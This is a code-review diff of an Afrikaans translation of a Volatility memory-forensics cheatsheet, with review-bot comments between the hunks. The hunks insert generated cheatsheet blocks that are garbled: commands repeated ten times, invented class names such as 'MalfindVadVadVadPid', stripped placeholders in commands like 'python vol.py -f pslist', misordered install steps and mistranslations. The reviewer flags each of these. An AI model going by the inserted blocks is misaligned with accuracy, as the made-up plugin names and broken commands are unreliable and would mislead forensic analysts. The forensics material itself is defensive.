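Review bot: The `### Skandeer/dump` hunk (`@@ -543,9 +1801,80 @@`) inserts a near-verbatim copy of the English `# Volatility Cheatsheet` block already inserted in the network hunk, down to the same empty placeholders in `python vol.py -f [options]` and `python vol.py -f dumpfiles --dump-dir --name`; duplicated, untranslated English content does not belong in an Afrikaans translation. Remove it and restore the `{% endtab %}` / `{% tab title="vol2" %}` markers so the vol2 `filescan` / `dumpfiles` / `linux_find_file` lines stay in their own tab.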
@@ -558,43 +1887,176 @@ volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O / {% endtab %} {% endtabs %} -### Master File Table +### Meesterlêertabel {% tabs %} {% tab title="vol3" %} ```bash # I couldn't find any plugin to extract this information in volatility3 ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. 
+ +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. + +## Volatility Profiele + +Hierdie is 'n lys van algemene profiele wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003R2SP0x86`: Windows 2003 R2 SP0 x86 +- `Win2003R2SP1x86`: Windows 2003 R2 SP1 x86 +- `Win2003R2SP2x86`: Windows 2003 R2 SP2 x86 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008R2SP0x86`: Windows 2008 R2 SP0 x86 +- `Win2008R2SP1x86`: Windows 2008 R2 SP1 x86 +- `Win2012SP0x86`: Windows 2012 SP0 x86 +- `Win2012SP1x86`: Windows 2012 SP1 x86 +- `Win2012R2SP0x86`: Windows 2012 R2 SP0 x86 +- `Win2012R2SP1x86`: Windows 2012 R2 SP1 x86 +- `Win2016SP0x86`: Windows 2016 SP0 x86 +- `Win2016SP1x86`: Windows 2016 SP1 x86 +- `Win2019SP0x86`: Windows 2019 SP0 x86 +- `Win2019SP1x86`: Windows 2019 SP1 x86 + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash volatility 
--profile=Win7SP1x86_23418 mftparser -f file.dmp ``` {% endtab %} {% endtabs %} -The **NTFS file system** uses a critical component known as the _master file table_ (MFT). This table includes at least one entry for every file on a volume, covering the MFT itself too. Vital details about each file, such as **size, timestamps, permissions, and actual data**, are encapsulated within the MFT entries or in areas external to the MFT but referenced by these entries. More details can be found in the [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). +Die **NTFS-lêersisteem** maak gebruik van 'n kritieke komponent wat bekend staan as die _meesterlêertabel_ (MFT). Hierdie tabel bevat ten minste een inskrywing vir elke lêer op 'n volume, wat ook die MFT self dek. Belangrike besonderhede oor elke lêer, soos **grootte, tydstempels, toestemmings en werklike data**, word gekapsuleer binne die MFT-inskrywings of in areas buite die MFT maar waarna verwys word deur hierdie inskrywings. Meer besonderhede kan gevind word in die [ampertlike dokumentasie](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table). -### SSL Keys/Certs - -{% tabs %} -{% tab title="vol3" %} +### SSL-sleutels/sertifikate ```bash #vol3 allows to search for certificates inside the registry ./vol.py -f file.dmp windows.registry.certificates.Certificates ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. 
+- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. +- `moddump`: Dump die inhoud van 'n spesifieke DLL se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir die opsporing van kwaadwillige prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `apihooks`: Lys alle API-hake in die geheue-dump. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir die opsporing van bestuurders. +- `devicetree`: Gee 'n boomstruktuur van alle toestelle in die geheue-dump. +- `privs`: Lys alle gebruikersprivileges in die geheue-dump. +- `getsids`: Lys alle sekuriteitsidentifikasies (SIDs) in die geheue-dump. +- `getsidsbyname`: Lys alle SIDs wat verband hou met 'n spesifieke gebruikersnaam. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `hivelist`: Lys alle gelaai Windows-registerhives in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke Windows-registerhive. 
+ +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Abstrakte klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Abstrakte klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Abstrakte klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Abstrakte klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Abstrakte klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Abstrakte klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Abstrakte klas vir netwerk-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Klas vir die malfind-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVad`: Klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Klas vir die malfind-VAD-VAD-PID-opdrag. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash #vol2 allos you to search and dump certificates from memory #Interesting options for this modules are: --pid, --name, --ssl volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ``` -{% endtab %} -{% endtabs %} - ## Malware {% tabs %} 
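Review bot: The MFT / SSL hunk (`@@ -558,43 +1887,176 @@`) has three problems. First, the generated block inserted in the MFT tabs repeats `- \`malfind\` ...` and `- \`volshell\` ...` ten times each and lists profiles such as `Win2016SP0x86`, `Win2016SP1x86`, `Win2019SP0x86` and `Win2019SP1x86` that match nothing used on this page (every command here uses `Win7SP1x86_23418` or `SomeLinux`); drop it and restore the `{% endtab %}` / `{% tab title="vol2" %}` markers around `mftparser`. Second, in `### SSL-sleutels/sertifikate` the hunk removes `{% tabs %}`, `{% tab title="vol3" %}`, `{% endtab %}` and `{% endtabs %}` entirely, so this one section loses the vol2/vol3 tabs the rest of the page uses, and the block inserted between the two fences invents a ladder of `MalfindVad`, `MalfindVadVad`, `MalfindVadVadPid` class names found nowhere else in the file; keep the tab markers and drop the block. Third, in the translated NTFS paragraph `ampertlike dokumentasie` should read `amptelike dokumentasie`.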
@@ -612,9 +2074,81 @@ volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp ./vol.py -f file.dmp linux.check_modules.Check_modules #Compares module list to sysfs info, if available ./vol.py -f file.dmp linux.tty_check.tty_check #Checks tty devices for hooks ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. 
This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as the file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp malfind [-D /tmp] #Find hidden and injected code [dump each suspicious section] volatility --profile=Win7SP1x86_23418 -f file.dmp apihooks #Detect API hooks in process and kernel memory 
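Review bot: the same breakage recurs here, where `-{% endtab %}` and `-{% tab title="vol2" %}` between the vol3 `linux.check_modules` block and the vol2 `malfind`/`apihooks` block are replaced by an untranslated English "Volatility Cheatsheet" (Introduction, Installation, Basic Usage, Process Analysis, Network Analysis, File Analysis, Conclusion), leaving the vol3 tab open around the vol2 code. Besides being off-topic for an Afrikaans translation, the inserted content is wrong in places: the angle-bracket placeholders have been stripped, so `python vol.py -f pslist` and `python vol.py -f [options]` are missing the dump path and plugin name; `python vol.py -f psscan --pid=` passes a PID filter to a pool-tag scanner that does not take one; the installation steps run `pip install -r requirements.txt` before the repository has been downloaded; and the Conclusion paragraph duplicates prose that appears verbatim three more times later in this patch. Restore the two tab lines and delete the inserted text.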
@@ -633,13 +2167,10 @@ volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers {% endtab %} {% endtabs %} -### Scanning with yara +### Skandering met yara -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. - -{% tabs %} -{% tab title="vol3" %} +Gebruik hierdie skripsie om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules 
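Review bot: "skripsie" in the translated sentence means a dissertation, not a script; "skrip" is the word wanted here ("Gebruik hierdie skrip om al die yara malware reëls ... af te laai en saam te voeg"). The hunk also deletes the `{% tabs %}` and `{% tab title="vol3" %}` opener in front of the vol3 `yarascan.YaraScan` block; the matching closers are not visible in this hunk, so either they are removed in a later one (in which case the vol3 and vol2 `yarascan` commands lose their tab labels and appear back to back with nothing telling the reader which is which) or they are left dangling. Keep the tab markup exactly as in the English source and translate only the two prose lines.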
@@ -649,9 +2180,82 @@ python malware_yara_rules.py #All ./vol.py -f file.dmp yarascan.YaraScan --yara-file /tmp/malware_rules.yar ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer die geheue-dump vir die opsporing van die KDBG-handvatsel. +- `kpcrscan`: Skandeer die geheue-dump vir die opsporing van die KPCR-handvatsel. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir die opsporing van lêers en hul metadata. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor alle virtuele adresruimtes in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte. +- `memdump`: Dump die inhoud van 'n spesifieke proses se geheue. +- `moddump`: Dump die inhoud van 'n spesifieke DLL se geheue. + +### Gevorderde Opdragte + +- `malfind`: Skandeer die geheue-dump vir die opsporing van kwaadwillige prosesse. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `apihooks`: Lys alle API-hake in die geheue-dump. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT). +- `gdt`: Gee inligting oor die Global Descriptor Table (GDT). +- `idt`: Gee inligting oor die Interrupt Descriptor Table (IDT). 
+- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir die opsporing van bestuurders. +- `devicetree`: Gee 'n boomstruktuur van alle toestelle in die geheue-dump. +- `privs`: Lys alle gebruikersprivileges in die geheue-dump. +- `getsids`: Lys alle sekuriteitsidentifikasies (SIDs) in die geheue-dump. +- `getsidsbyname`: Lys alle SIDs wat verband hou met 'n spesifieke gebruikersnaam. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `hivelist`: Lys alle gelaai Windows-registerhives in die geheue-dump. +- `hivedump`: Dump die inhoud van 'n spesifieke Windows-registerhive. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Abstrakte klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Abstrakte klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Abstrakte klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Abstrakte klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Abstrakte klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Abstrakte klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Abstrakte klas vir netwerk-opdragte. +- `volatility.plugins.common.AbstractRegistryCommand`: Abstrakte klas vir register-opdragte. +- `volatility.plugins.common.AbstractFileCommand`: Abstrakte klas vir lêer-opdragte. +- `volatility.plugins.common.AbstractProcessCommand`: Abstrakte klas vir proses-opdragte. +- `volatility.plugins.common.AbstractYaraCommand`: Abstrakte klas vir Yara-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Klas vir die malfind-opdrag. +- `volatility.plugins.malware.malfind.MalfindOffset`: Klas vir die malfind-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindPid`: Klas vir die malfind-PID-opdrag. 
+- `volatility.plugins.malware.malfind.MalfindVad`: Klas vir die malfind-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadOffset`: Klas vir die malfind-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadPid`: Klas vir die malfind-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVad`: Klas vir die malfind-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadOffset`: Klas vir die malfind-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadPid`: Klas vir die malfind-VAD-VAD-PID-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVad`: Klas vir die malfind-VAD-VAD-VAD-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVadOffset`: Klas vir die malfind-VAD-VAD-VAD-offset-opdrag. +- `volatility.plugins.malware.malfind.MalfindVadVadVadPid`: Klas vir die malfind-VAD-VAD-VAD-PID-opdrag. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules 
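Review bot: the `-{% endtab %}` / `-{% tab title="vol2" %}` pair after the vol3 `yarascan.YaraScan` block is again replaced with a generated cheat sheet, this time a near-verbatim copy of the one inserted earlier in the patch but extended with still more names that do not exist in Volatility 2 (`AbstractRegistryCommand`, `AbstractFileCommand`, `AbstractProcessCommand`, `AbstractYaraCommand`, `MalfindVadVadVad`, `MalfindVadVadVadPid`). Nothing in this block corresponds to the English source, and it splits the section so that the vol2 `wget ... malware_yara_rules.py` / `mkdir rules` commands that follow no longer sit in a tab. Revert to the two template lines.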
@@ -663,42 +2267,177 @@ volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | ## MISC -### External plugins +### Eksterne invoegtoepassings -If you want to use external plugins make sure that the folders related to the plugins are the first parameter used. - -{% tabs %} -{% tab title="vol3" %} +As jy eksterne invoegtoepassings wil gebruik, maak seker dat die gids wat verband hou met die invoegtoepassings die eerste parameter is wat gebruik word. ```bash ./vol.py --plugin-dirs "/tmp/plugins/" [...] ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `volatility -f imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die profiel. +- `volatility -f --profile= pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `volatility -f --profile= psscan`: Skandeer vir prosesse in die geheue-dump. +- `volatility -f --profile= pstree`: Gee 'n boomstruktuur van die prosesse in die geheue-dump. +- `volatility -f --profile= dlllist -p `: Lys alle DLL's wat deur 'n spesifieke proses gelaai is. +- `volatility -f --profile= handles -p `: Lys alle handvatsels wat deur 'n spesifieke proses gebruik word. +- `volatility -f --profile= cmdline -p `: Gee die opdraglyn-argumente vir 'n spesifieke proses. +- `volatility -f --profile= filescan`: Skandeer vir oop lêers in die geheue-dump. +- `volatility -f --profile= netscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `volatility -f --profile= connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `volatility -f --profile= hivelist`: Lys alle gelaai registernood in die geheue-dump. +- `volatility -f --profile= hivedump -o -s -f `: Dump 'n spesifieke registernood na 'n lêer. 
+ +### Gevorderde Opdragte + +- `volatility -f --profile= malfind`: Skandeer vir verdagte kode in die geheue-dump. +- `volatility -f --profile= malfind -D `: Dump die verdagte kode na 'n lêer. +- `volatility -f --profile= vadinfo -p `: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= vadtree -p `: Gee 'n boomstruktuur van die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= vadwalk -p `: Loop deur die virtuele adresruimte van 'n spesifieke proses. +- `volatility -f --profile= memdump -p -D `: Dump die geheue van 'n spesifieke proses na 'n lêer. +- `volatility -f --profile= memmap`: Gee 'n lys van alle geheuekaarte in die geheue-dump. +- `volatility -f --profile= memmap -p `: Gee 'n lys van alle geheuekaarte vir 'n spesifieke proses. +- `volatility -f --profile= memdump -r -D `: Dump 'n spesifieke geheuekaart na 'n lêer. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.registry.registryapi.RegistryApi`: API vir die hantering van registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKey`: Druk die inhoud van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintValue`: Druk die waarde van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintValues`: Druk alle waardes van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintSubkeys`: Druk alle subnood van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithValues`: Druk die inhoud en waardes van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithSubkeys`: Druk die inhoud en subnood van 'n registernood. +- `volatility.plugins.registry.registryprintkey.RegistryPrintKeyWithValuesAndSubkeys`: Druk die inhoud, waardes en subnood van 'n registernood. 
+ +### Gevorderde Funksies + +- `volatility.plugins.registry.registryapi.RegistryApi.get_hive_by_name`: Kry 'n registernood deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_hive_by_offset`: Kry 'n registernood deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_by_path`: Kry 'n registernood deur sy pad. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_by_name`: Kry 'n waarde deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_by_offset`: Kry 'n waarde deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_name`: Kry 'n subnood deur sy naam. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_offset`: Kry 'n subnood deur sy offset. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkey_by_path`: Kry 'n subnood deur sy pad. +- `volatility.plugins.registry.registryapi.RegistryApi.get_subkeys`: Kry 'n lys van alle subnood van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_values`: Kry 'n lys van alle waardes van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_path`: Kry die pad van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_key_name`: Kry die naam van 'n registernood. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_name`: Kry die naam van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_data`: Kry die data van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_type`: Kry die tipe van 'n waarde. +- `volatility.plugins.registry.registryapi.RegistryApi.get_value_size`: Kry die grootte van 'n waarde. + +## Bronne + +- [Volatility Framework](https://www.volatilityfoundation.org/) +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) ```bash - volatilitye --plugins="/tmp/plugins/" [...] 
+volatilitye --plugins="/tmp/plugins/" [...] ``` {% endtab %} {% endtabs %} #### Autoruns -Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) - +Laai dit af van [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns) ``` - volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns +volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns ``` - -### Mutexes +### Mutexe {% tabs %} {% tab title="vol3" %} ``` ./vol.py -f file.dmp windows.mutantscan.MutantScan ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. 
+ +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process. + +``` +python vol.py -f psscan -p +``` + +Replace `` with the ID of the process you want to analyze. + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump 